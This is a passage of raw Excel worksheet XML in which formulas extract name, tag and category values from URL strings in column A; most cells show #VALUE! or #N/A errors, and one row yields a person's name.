    ISNUMBER(FIND("tag/",$A567)), MID($A567, FIND("tag/",$A567) + 4, LEN($A567) - FIND("tag/",$A567)),
    ISNUMBER(FIND("category",$A567)), MID($A567, FIND("category",$A567) + 9, LEN($A567) - FIND("category",$A567)))</f>
        <v>#N/A</v>
      </c>
      <c r="F567" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="568" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A568" t="s">
        <v>2461</v>
      </c>
      <c r="B568" t="e">
        <f t="shared" si="25"/>
        <v>#VALUE!</v>
      </c>
      <c r="C568" t="e">
        <f t="shared" si="26"/>
        <v>#VALUE!</v>
      </c>
      <c r="D568" t="e">
        <f t="shared" si="27"/>
        <v>#VALUE!</v>
      </c>
      <c r="E568" t="e" cm="1">
        <f t="array" ref="E568">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A568)), MID($A568, FIND("name=",$A568) + 5, LEN($A568) - FIND("name=",$A568)),
    ISNUMBER(FIND("tag/",$A568)), MID($A568, FIND("tag/",$A568) + 4, LEN($A568) - FIND("tag/",$A568)),
    ISNUMBER(FIND("category",$A568)), MID($A568, FIND("category",$A568) + 9, LEN($A568) - FIND("category",$A568)))</f>
        <v>#N/A</v>
      </c>
      <c r="F568" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="569" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A569" t="s">
        <v>2462</v>
      </c>
      <c r="B569" t="e">
        <f t="shared" si="25"/>
        <v>#VALUE!</v>
      </c>
      <c r="C569" t="e">
        <f t="shared" si="26"/>
        <v>#VALUE!</v>
      </c>
      <c r="D569" t="e">
        <f t="shared" si="27"/>
        <v>#VALUE!</v>
      </c>
      <c r="E569" t="e" cm="1">
        <f t="array" ref="E569">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A569)), MID($A569, FIND("name=",$A569) + 5, LEN($A569) - FIND("name=",$A569)),
    ISNUMBER(FIND("tag/",$A569)), MID($A569, FIND("tag/",$A569) + 4, LEN($A569) - FIND("tag/",$A569)),
    ISNUMBER(FIND("category",$A569)), MID($A569, FIND("category",$A569) + 9, LEN($A569) - FIND("category",$A569)))</f>
        <v>#N/A</v>
      </c>
      <c r="F569" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="570" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A570" t="s">
        <v>2463</v>
      </c>
      <c r="B570" t="e">
        <f t="shared" si="25"/>
        <v>#VALUE!</v>
      </c>
      <c r="C570" t="e">
        <f t="shared" si="26"/>
        <v>#VALUE!</v>
      </c>
      <c r="D570" t="e">
        <f t="shared" si="27"/>
        <v>#VALUE!</v>
      </c>
      <c r="E570" t="e" cm="1">
        <f t="array" ref="E570">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A570)), MID($A570, FIND("name=",$A570) + 5, LEN($A570) - FIND("name=",$A570)),
    ISNUMBER(FIND("tag/",$A570)), MID($A570, FIND("tag/",$A570) + 4, LEN($A570) - FIND("tag/",$A570)),
    ISNUMBER(FIND("category",$A570)), MID($A570, FIND("category",$A570) + 9, LEN($A570) - FIND("category",$A570)))</f>
        <v>#N/A</v>
      </c>
      <c r="F570" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="571" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A571" t="s">
        <v>2464</v>
      </c>
      <c r="B571" t="e">
        <f t="shared" si="25"/>
        <v>#VALUE!</v>
      </c>
      <c r="C571" t="e">
        <f t="shared" si="26"/>
        <v>#VALUE!</v>
      </c>
      <c r="D571" t="e">
        <f t="shared" si="27"/>
        <v>#VALUE!</v>
      </c>
      <c r="E571" t="e" cm="1">
        <f t="array" ref="E571">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A571)), MID($A571, FIND("name=",$A571) + 5, LEN($A571) - FIND("name=",$A571)),
    ISNUMBER(FIND("tag/",$A571)), MID($A571, FIND("tag/",$A571) + 4, LEN($A571) - FIND("tag/",$A571)),
    ISNUMBER(FIND("category",$A571)), MID($A571, FIND("category",$A571) + 9, LEN($A571) - FIND("category",$A571)))</f>
        <v>#N/A</v>
      </c>
      <c r="F571" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="572" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A572" t="s">
        <v>2465</v>
      </c>
      <c r="B572" t="e">
        <f t="shared" si="25"/>
        <v>#VALUE!</v>
      </c>
      <c r="C572" t="e">
        <f t="shared" si="26"/>
        <v>#VALUE!</v>
      </c>
      <c r="D572" t="e">
        <f t="shared" si="27"/>
        <v>#VALUE!</v>
      </c>
      <c r="E572" t="e" cm="1">
        <f t="array" ref="E572">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A572)), MID($A572, FIND("name=",$A572) + 5, LEN($A572) - FIND("name=",$A572)),
    ISNUMBER(FIND("tag/",$A572)), MID($A572, FIND("tag/",$A572) + 4, LEN($A572) - FIND("tag/",$A572)),
    ISNUMBER(FIND("category",$A572)), MID($A572, FIND("category",$A572) + 9, LEN($A572) - FIND("category",$A572)))</f>
        <v>#N/A</v>
      </c>
      <c r="F572" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="573" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A573" t="s">
        <v>2458</v>
      </c>
      <c r="B573" t="e">
        <f t="shared" si="25"/>
        <v>#VALUE!</v>
      </c>
      <c r="C573" t="e">
        <f t="shared" si="26"/>
        <v>#VALUE!</v>
      </c>
      <c r="D573" t="e">
        <f t="shared" si="27"/>
        <v>#VALUE!</v>
      </c>
      <c r="E573" t="e" cm="1">
        <f t="array" ref="E573">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A573)), MID($A573, FIND("name=",$A573) + 5, LEN($A573) - FIND("name=",$A573)),
    ISNUMBER(FIND("tag/",$A573)), MID($A573, FIND("tag/",$A573) + 4, LEN($A573) - FIND("tag/",$A573)),
    ISNUMBER(FIND("category",$A573)), MID($A573, FIND("category",$A573) + 9, LEN($A573) - FIND("category",$A573)))</f>
        <v>#N/A</v>
      </c>
      <c r="F573" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="574" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A574" t="s">
        <v>2459</v>
      </c>
      <c r="B574" t="e">
        <f t="shared" si="25"/>
        <v>#VALUE!</v>
      </c>
      <c r="C574" t="e">
        <f t="shared" si="26"/>
        <v>#VALUE!</v>
      </c>
      <c r="D574" t="e">
        <f t="shared" si="27"/>
        <v>#VALUE!</v>
      </c>
      <c r="E574" t="e" cm="1">
        <f t="array" ref="E574">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A574)), MID($A574, FIND("name=",$A574) + 5, LEN($A574) - FIND("name=",$A574)),
    ISNUMBER(FIND("tag/",$A574)), MID($A574, FIND("tag/",$A574) + 4, LEN($A574) - FIND("tag/",$A574)),
    ISNUMBER(FIND("category",$A574)), MID($A574, FIND("category",$A574) + 9, LEN($A574) - FIND("category",$A574)))</f>
        <v>#N/A</v>
      </c>
      <c r="F574" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="575" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A575" t="s">
        <v>2466</v>
      </c>
      <c r="B575" t="e">
        <f t="shared" si="25"/>
        <v>#VALUE!</v>
      </c>
      <c r="C575" t="e">
        <f t="shared" si="26"/>
        <v>#VALUE!</v>
      </c>
      <c r="D575" t="e">
        <f t="shared" si="27"/>
        <v>#VALUE!</v>
      </c>
      <c r="E575" t="e" cm="1">
        <f t="array" ref="E575">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A575)), MID($A575, FIND("name=",$A575) + 5, LEN($A575) - FIND("name=",$A575)),
    ISNUMBER(FIND("tag/",$A575)), MID($A575, FIND("tag/",$A575) + 4, LEN($A575) - FIND("tag/",$A575)),
    ISNUMBER(FIND("category",$A575)), MID($A575, FIND("category",$A575) + 9, LEN($A575) - FIND("category",$A575)))</f>
        <v>#N/A</v>
      </c>
      <c r="F575" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="576" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A576" t="s">
        <v>2319</v>
      </c>
      <c r="B576" t="e">
        <f t="shared" si="25"/>
        <v>#VALUE!</v>
      </c>
      <c r="C576" t="e">
        <f t="shared" si="26"/>
        <v>#VALUE!</v>
      </c>
      <c r="D576" t="e">
        <f t="shared" si="27"/>
        <v>#VALUE!</v>
      </c>
      <c r="E576" t="e" cm="1">
        <f t="array" ref="E576">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A576)), MID($A576, FIND("name=",$A576) + 5, LEN($A576) - FIND("name=",$A576)),
    ISNUMBER(FIND("tag/",$A576)), MID($A576, FIND("tag/",$A576) + 4, LEN($A576) - FIND("tag/",$A576)),
    ISNUMBER(FIND("category",$A576)), MID($A576, FIND("category",$A576) + 9, LEN($A576) - FIND("category",$A576)))</f>
        <v>#N/A</v>
      </c>
      <c r="F576" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="577" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A577" t="s">
        <v>2288</v>
      </c>
      <c r="B577" t="e">
        <f t="shared" si="25"/>
        <v>#VALUE!</v>
      </c>
      <c r="C577" t="e">
        <f t="shared" si="26"/>
        <v>#VALUE!</v>
      </c>
      <c r="D577" t="e">
        <f t="shared" si="27"/>
        <v>#VALUE!</v>
      </c>
      <c r="E577" t="e" cm="1">
        <f t="array" ref="E577">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A577)), MID($A577, FIND("name=",$A577) + 5, LEN($A577) - FIND("name=",$A577)),
    ISNUMBER(FIND("tag/",$A577)), MID($A577, FIND("tag/",$A577) + 4, LEN($A577) - FIND("tag/",$A577)),
    ISNUMBER(FIND("category",$A577)), MID($A577, FIND("category",$A577) + 9, LEN($A577) - FIND("category",$A577)))</f>
        <v>#N/A</v>
      </c>
      <c r="F577" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="578" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A578" t="s">
        <v>2319</v>
      </c>
      <c r="B578" t="e">
        <f t="shared" si="25"/>
        <v>#VALUE!</v>
      </c>
      <c r="C578" t="e">
        <f t="shared" si="26"/>
        <v>#VALUE!</v>
      </c>
      <c r="D578" t="e">
        <f t="shared" si="27"/>
        <v>#VALUE!</v>
      </c>
      <c r="E578" t="e" cm="1">
        <f t="array" ref="E578">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A578)), MID($A578, FIND("name=",$A578) + 5, LEN($A578) - FIND("name=",$A578)),
    ISNUMBER(FIND("tag/",$A578)), MID($A578, FIND("tag/",$A578) + 4, LEN($A578) - FIND("tag/",$A578)),
    ISNUMBER(FIND("category",$A578)), MID($A578, FIND("category",$A578) + 9, LEN($A578) - FIND("category",$A578)))</f>
        <v>#N/A</v>
      </c>
      <c r="F578" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="579" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A579" t="s">
        <v>2319</v>
      </c>
      <c r="B579" t="e">
        <f t="shared" si="25"/>
        <v>#VALUE!</v>
      </c>
      <c r="C579" t="e">
        <f t="shared" si="26"/>
        <v>#VALUE!</v>
      </c>
      <c r="D579" t="e">
        <f t="shared" si="27"/>
        <v>#VALUE!</v>
      </c>
      <c r="E579" t="e" cm="1">
        <f t="array" ref="E579">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A579)), MID($A579, FIND("name=",$A579) + 5, LEN($A579) - FIND("name=",$A579)),
    ISNUMBER(FIND("tag/",$A579)), MID($A579, FIND("tag/",$A579) + 4, LEN($A579) - FIND("tag/",$A579)),
    ISNUMBER(FIND("category",$A579)), MID($A579, FIND("category",$A579) + 9, LEN($A579) - FIND("category",$A579)))</f>
        <v>#N/A</v>
      </c>
      <c r="F579" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="580" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A580" t="s">
        <v>2414</v>
      </c>
      <c r="B580" t="e">
        <f t="shared" si="25"/>
        <v>#VALUE!</v>
      </c>
      <c r="C580" t="e">
        <f t="shared" si="26"/>
        <v>#VALUE!</v>
      </c>
      <c r="D580" t="e">
        <f t="shared" si="27"/>
        <v>#VALUE!</v>
      </c>
      <c r="E580" t="e" cm="1">
        <f t="array" ref="E580">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A580)), MID($A580, FIND("name=",$A580) + 5, LEN($A580) - FIND("name=",$A580)),
    ISNUMBER(FIND("tag/",$A580)), MID($A580, FIND("tag/",$A580) + 4, LEN($A580) - FIND("tag/",$A580)),
    ISNUMBER(FIND("category",$A580)), MID($A580, FIND("category",$A580) + 9, LEN($A580) - FIND("category",$A580)))</f>
        <v>#N/A</v>
      </c>
      <c r="F580" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="581" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A581" t="s">
        <v>2467</v>
      </c>
      <c r="B581" t="e">
        <f t="shared" si="25"/>
        <v>#VALUE!</v>
      </c>
      <c r="C581" t="e">
        <f t="shared" si="26"/>
        <v>#VALUE!</v>
      </c>
      <c r="D581" t="e">
        <f t="shared" si="27"/>
        <v>#VALUE!</v>
      </c>
      <c r="E581" t="e" cm="1">
        <f t="array" ref="E581">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A581)), MID($A581, FIND("name=",$A581) + 5, LEN($A581) - FIND("name=",$A581)),
    ISNUMBER(FIND("tag/",$A581)), MID($A581, FIND("tag/",$A581) + 4, LEN($A581) - FIND("tag/",$A581)),
    ISNUMBER(FIND("category",$A581)), MID($A581, FIND("category",$A581) + 9, LEN($A581) - FIND("category",$A581)))</f>
        <v>#N/A</v>
      </c>
      <c r="F581" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="582" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A582" t="s">
        <v>2418</v>
      </c>
      <c r="B582" t="e">
        <f t="shared" ref="B582:B645" si="28">IF(FIND("name=",A582,1)&gt;0,MID(A582,FIND("name=",A582,1)+5,LEN(A582)-FIND("name=",A582,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="C582" t="e">
        <f t="shared" ref="C582:C645" si="29">IF(FIND("tag/",$A582,1)&gt;0,MID($A582,FIND("tag/",$A582,1)+4,LEN($A582)-FIND("tag/",$A582,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="D582" t="e">
        <f t="shared" si="27"/>
        <v>#VALUE!</v>
      </c>
      <c r="E582" t="e" cm="1">
        <f t="array" ref="E582">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A582)), MID($A582, FIND("name=",$A582) + 5, LEN($A582) - FIND("name=",$A582)),
    ISNUMBER(FIND("tag/",$A582)), MID($A582, FIND("tag/",$A582) + 4, LEN($A582) - FIND("tag/",$A582)),
    ISNUMBER(FIND("category",$A582)), MID($A582, FIND("category",$A582) + 9, LEN($A582) - FIND("category",$A582)))</f>
        <v>#N/A</v>
      </c>
      <c r="F582" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="583" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A583" t="s">
        <v>2468</v>
      </c>
      <c r="B583" t="e">
        <f t="shared" si="28"/>
        <v>#VALUE!</v>
      </c>
      <c r="C583" t="e">
        <f t="shared" si="29"/>
        <v>#VALUE!</v>
      </c>
      <c r="D583" t="e">
        <f t="shared" si="27"/>
        <v>#VALUE!</v>
      </c>
      <c r="E583" t="e" cm="1">
        <f t="array" ref="E583">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A583)), MID($A583, FIND("name=",$A583) + 5, LEN($A583) - FIND("name=",$A583)),
    ISNUMBER(FIND("tag/",$A583)), MID($A583, FIND("tag/",$A583) + 4, LEN($A583) - FIND("tag/",$A583)),
    ISNUMBER(FIND("category",$A583)), MID($A583, FIND("category",$A583) + 9, LEN($A583) - FIND("category",$A583)))</f>
        <v>#N/A</v>
      </c>
      <c r="F583" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="584" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A584" t="s">
        <v>2469</v>
      </c>
      <c r="B584" t="e">
        <f t="shared" si="28"/>
        <v>#VALUE!</v>
      </c>
      <c r="C584" t="e">
        <f t="shared" si="29"/>
        <v>#VALUE!</v>
      </c>
      <c r="D584" t="e">
        <f t="shared" si="27"/>
        <v>#VALUE!</v>
      </c>
      <c r="E584" t="e" cm="1">
        <f t="array" ref="E584">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A584)), MID($A584, FIND("name=",$A584) + 5, LEN($A584) - FIND("name=",$A584)),
    ISNUMBER(FIND("tag/",$A584)), MID($A584, FIND("tag/",$A584) + 4, LEN($A584) - FIND("tag/",$A584)),
    ISNUMBER(FIND("category",$A584)), MID($A584, FIND("category",$A584) + 9, LEN($A584) - FIND("category",$A584)))</f>
        <v>#N/A</v>
      </c>
      <c r="F584" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="585" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A585" t="s">
        <v>2403</v>
      </c>
      <c r="B585" t="e">
        <f t="shared" si="28"/>
        <v>#VALUE!</v>
      </c>
      <c r="C585" t="e">
        <f t="shared" si="29"/>
        <v>#VALUE!</v>
      </c>
      <c r="D585" t="e">
        <f t="shared" si="27"/>
        <v>#VALUE!</v>
      </c>
      <c r="E585" t="e" cm="1">
        <f t="array" ref="E585">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A585)), MID($A585, FIND("name=",$A585) + 5, LEN($A585) - FIND("name=",$A585)),
    ISNUMBER(FIND("tag/",$A585)), MID($A585, FIND("tag/",$A585) + 4, LEN($A585) - FIND("tag/",$A585)),
    ISNUMBER(FIND("category",$A585)), MID($A585, FIND("category",$A585) + 9, LEN($A585) - FIND("category",$A585)))</f>
        <v>#N/A</v>
      </c>
      <c r="F585" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="586" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A586" t="s">
        <v>2319</v>
      </c>
      <c r="B586" t="e">
        <f t="shared" si="28"/>
        <v>#VALUE!</v>
      </c>
      <c r="C586" t="e">
        <f t="shared" si="29"/>
        <v>#VALUE!</v>
      </c>
      <c r="D586" t="e">
        <f t="shared" si="27"/>
        <v>#VALUE!</v>
      </c>
      <c r="E586" t="e" cm="1">
        <f t="array" ref="E586">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A586)), MID($A586, FIND("name=",$A586) + 5, LEN($A586) - FIND("name=",$A586)),
    ISNUMBER(FIND("tag/",$A586)), MID($A586, FIND("tag/",$A586) + 4, LEN($A586) - FIND("tag/",$A586)),
    ISNUMBER(FIND("category",$A586)), MID($A586, FIND("category",$A586) + 9, LEN($A586) - FIND("category",$A586)))</f>
        <v>#N/A</v>
      </c>
      <c r="F586" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="587" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A587" t="s">
        <v>2248</v>
      </c>
      <c r="B587" t="e">
        <f t="shared" si="28"/>
        <v>#VALUE!</v>
      </c>
      <c r="C587" t="e">
        <f t="shared" si="29"/>
        <v>#VALUE!</v>
      </c>
      <c r="D587" t="e">
        <f t="shared" ref="D587:D650" si="30">IF(FIND("category",$A587,1)&gt;0,MID($A587,FIND("category",$A587,1)+9,LEN($A587)-FIND("category",$A587,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="E587" t="e" cm="1">
        <f t="array" ref="E587">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A587)), MID($A587, FIND("name=",$A587) + 5, LEN($A587) - FIND("name=",$A587)),
    ISNUMBER(FIND("tag/",$A587)), MID($A587, FIND("tag/",$A587) + 4, LEN($A587) - FIND("tag/",$A587)),
    ISNUMBER(FIND("category",$A587)), MID($A587, FIND("category",$A587) + 9, LEN($A587) - FIND("category",$A587)))</f>
        <v>#N/A</v>
      </c>
      <c r="F587" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="588" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A588" t="s">
        <v>2319</v>
      </c>
      <c r="B588" t="e">
        <f t="shared" si="28"/>
        <v>#VALUE!</v>
      </c>
      <c r="C588" t="e">
        <f t="shared" si="29"/>
        <v>#VALUE!</v>
      </c>
      <c r="D588" t="e">
        <f t="shared" si="30"/>
        <v>#VALUE!</v>
      </c>
      <c r="E588" t="e" cm="1">
        <f t="array" ref="E588">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A588)), MID($A588, FIND("name=",$A588) + 5, LEN($A588) - FIND("name=",$A588)),
    ISNUMBER(FIND("tag/",$A588)), MID($A588, FIND("tag/",$A588) + 4, LEN($A588) - FIND("tag/",$A588)),
    ISNUMBER(FIND("category",$A588)), MID($A588, FIND("category",$A588) + 9, LEN($A588) - FIND("category",$A588)))</f>
        <v>#N/A</v>
      </c>
      <c r="F588" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="589" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A589" t="s">
        <v>2418</v>
      </c>
      <c r="B589" t="e">
        <f t="shared" si="28"/>
        <v>#VALUE!</v>
      </c>
      <c r="C589" t="e">
        <f t="shared" si="29"/>
        <v>#VALUE!</v>
      </c>
      <c r="D589" t="e">
        <f t="shared" si="30"/>
        <v>#VALUE!</v>
      </c>
      <c r="E589" t="e" cm="1">
        <f t="array" ref="E589">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A589)), MID($A589, FIND("name=",$A589) + 5, LEN($A589) - FIND("name=",$A589)),
    ISNUMBER(FIND("tag/",$A589)), MID($A589, FIND("tag/",$A589) + 4, LEN($A589) - FIND("tag/",$A589)),
    ISNUMBER(FIND("category",$A589)), MID($A589, FIND("category",$A589) + 9, LEN($A589) - FIND("category",$A589)))</f>
        <v>#N/A</v>
      </c>
      <c r="F589" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="590" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A590" t="s">
        <v>2470</v>
      </c>
      <c r="B590" t="str">
        <f t="shared" si="28"/>
        <v>Neha%20Saha</v>
      </c>
      <c r="C590" t="e">
        <f t="shared" si="29"/>
        <v>#VALUE!</v>
      </c>
      <c r="D590" t="e">
        <f t="shared" si="30"/>
        <v>#VALUE!</v>
      </c>
      <c r="E590" t="str" cm="1">
        <f t="array" ref="E590">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A590)), MID($A590, FIND("name=",$A590) + 5, LEN($A590) - FIND("name=",$A590)),
    ISNUMBER(FIND("tag/",$A590)), MID($A590, FIND("tag/",$A590) + 4, LEN($A590) - FIND("tag/",$A590)),
    ISNUMBER(FIND("category",$A590)), MID($A590, FIND("category",$A590) + 9, LEN($A590) - FIND("category",$A590)))</f>
        <v>Neha%20Saha</v>
      </c>
      <c r="F590" t="s">
        <v>3354</v>
      </c>
    </row>
    <row r="591" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A591" t="s">
        <v>2319</v>
      </c>
      <c r="B591" t="e">
        <f t="shared" si="28"/>
        <v>#VALUE!</v>
      </c>
      <c r="C591" t="e">
        <f t="shared" si="29"/>
        <v>#VALUE!</v>
      </c>
      <c r="D591" t="e">
        <f t="shared" si="30"/>
        <v>#VALUE!</v>
      </c>
      <c r="E591" t="e" cm="1">
        <f t="array" ref="E591">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A591)), MID($A591, FIND("name=",$A591) + 5, LEN($A591) - FIND("name=",$A591)),
    ISNUMBER(FIND("tag/",$A591)), MID($A591, FIND("tag/",$A591) + 4, LEN($A591) - FIND("tag/",$A591)),
    ISNUMBER(FIND("category",$A591)), MID($A591, FIND("category",$A591) + 9, LEN($A591) - FIND("category",$A591)))</f>
        <v>#N/A</v>
      </c>
      <c r="F591" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="592" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A592" t="s">
        <v>2346</v>
      </c>
      <c r="B592" t="e">
        <f t="shared" si="28"/>
        <v>#VALUE!</v>
      </c>
      <c r="C592" t="e">
        <f t="shared" si="29"/>
        <v>#VALUE!</v>
      </c>
      <c r="D592" t="e">
        <f t="shared" si="30"/>
        <v>#VALUE!</v>
      </c>
      <c r="E592" t="e" cm="1">
        <f t="array" ref="E592">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A592)), MID($A592, FIND("name=",$A592) + 5, LEN($A592) - FIND("name=",$A592)),
    ISNUMBER(FIND("tag/",$A592)), MID($A592, FIND("tag/",$A592) + 4, LEN($A592) - FIND("tag/",$A592)),
    ISNUMBER(FIND("category",$A592)), MID($A592, FIND("category",$A592) + 9, LEN($A592) - FIND("category",$A592)))</f>
        <v>#N/A</v>
      </c>
      <c r="F592" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="593" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A593" t="s">
        <v>2346</v>
      </c>
      <c r="B593" t="e">
        <f t="shared" si="28"/>
        <v>#VALUE!</v>
      </c>
      <c r="C593" t="e">
        <f t="shared" si="29"/>
        <v>#VALUE!</v>
      </c>
      <c r="D593" t="e">
        <f t="shared" si="30"/>
        <v>#VALUE!</v>
      </c>
      <c r="E593" t="e" cm="1">
        <f t="array" ref="E593">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A593)), MID($A593, FIND("name=",$A593) + 5, LEN($A593) - FIND("name=",$A593)),
    ISNUMBER(FIND("tag/",$A593)), MID($A593, FIND("tag/",$A593) + 4, LEN($A593) - FIND("tag/",$A593)),
    ISNUMBER(FIND("category",$A593)), MID($A593, FIND("category",$A593) + 9, LEN($A593) - FIND("category",$A593)))</f>
        <v>#N/A</v>
      </c>
      <c r="F593" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="594" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A594" t="s">
        <v>2346</v>
      </c>
      <c r="B594" t="e">
        <f t="shared" si="28"/>
        <v>#VALUE!</v>
      </c>
      <c r="C594" t="e">
        <f t="shared" si="29"/>
        <v>#VALUE!</v>
      </c>
      <c r="D594" t="e">
        <f t="shared" si="30"/>
        <v>#VALUE!</v>
      </c>
      <c r="E594" t="e" cm="1">
        <f t="array" ref="E594">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A594)), MID($A594, FIND("name=",$A594) + 5, LEN($A594) - FIND("name=",$A594)),
    ISNUMBER(FIND("tag/",$A594)), MID($A594, FIND("tag/",$A594) + 4, LEN($A594) - FIND("tag/",$A594)),
    ISNUMBER(FIND("category",$A594)), MID($A594, FIND("category",$A594) + 9, LEN($A594) - FIND("category",$A594)))</f>
        <v>#N/A</v>
      </c>
      <c r="F594" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="595" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A595" t="s">
        <v>2346</v>
      </c>
      <c r="B595" t="e">
        <f t="shared" si="28"/>
        <v>#VALUE!</v>
      </c>
      <c r="C595" t="e">
        <f t="shared" si="29"/>
        <v>#VALUE!</v>
      </c>
      <c r="D595" t="e">
        <f t="shared" si="30"/>
        <v>#VALUE!</v>
      </c>
      <c r="E595" t="e" cm="1">
        <f t="array" ref="E595">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A595)), MID($A595, FIND("name=",$A595) + 5, LEN($A595) - FIND("name=",$A595)),
    ISNUMBER(FIND("tag/",$A595)), MID($A595, FIND("tag/",$A595) + 4, LEN($A595) - FIND("tag/",$A595)),
    ISNUMBER(FIND("category",$A595)), MID($A595, FIND("category",$A595) + 9, LEN($A595) - FIND("category",$A595)))</f>
        <v>#N/A</v>
      </c>
      <c r="F595" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="596" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A596" t="s">
        <v>2248</v>
      </c>
      <c r="B596" t="e">
        <f t="shared" si="28"/>
        <v>#VALUE!</v>
      </c>
      <c r="C596" t="e">
        <f t="shared" si="29"/>
        <v>#VALUE!</v>
      </c>
      <c r="D596" t="e">
        <f t="shared" si="30"/>
        <v>#VALUE!</v>
      </c>
      <c r="E596" t="e" cm="1">
        <f t="array" ref="E596">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A596)), MID($A596, FIND("name=",$A596) + 5, LEN($A596) - FIND("name=",$A596)),
    ISNUMBER(FIND("tag/",$A596)), MID($A596, FIND("tag/",$A596) + 4, LEN($A596) - FIND("tag/",$A596)),
    ISNUMBER(FIND("category",$A596)), MID($A596, FIND("category",$A596) + 9, LEN($A596) - FIND("category",$A596)))</f>
        <v>#N/A</v>
      </c>
      <c r="F596" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="597" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A597" t="s">
        <v>2319</v>
      </c>
      <c r="B597" t="e">
        <f t="shared" si="28"/>
        <v>#VALUE!</v>
      </c>
      <c r="C597" t="e">
        <f t="shared" si="29"/>
        <v>#VALUE!</v>
      </c>
      <c r="D597" t="e">
        <f t="shared" si="30"/>
        <v>#VALUE!</v>
      </c>
      <c r="E597" t="e" cm="1">
        <f t="array" ref="E597">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A597)), MID($A597, FIND("name=",$A597) + 5, LEN($A597) - FIND("name=",$A597)),
    ISNUMBER(FIND("tag/",$A597)), MID($A597, FIND("tag/",$A597) + 4, LEN($A597) - FIND("tag/",$A597)),
    ISNUMBER(FIND("category",$A597)), MID($A597, FIND("category",$A597) + 9, LEN($A597) - FIND("category",$A597)))</f>
        <v>#N/A</v>
      </c>
      <c r="F597" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="598" spans="1:6" x14ac:dyDescent="0.35">
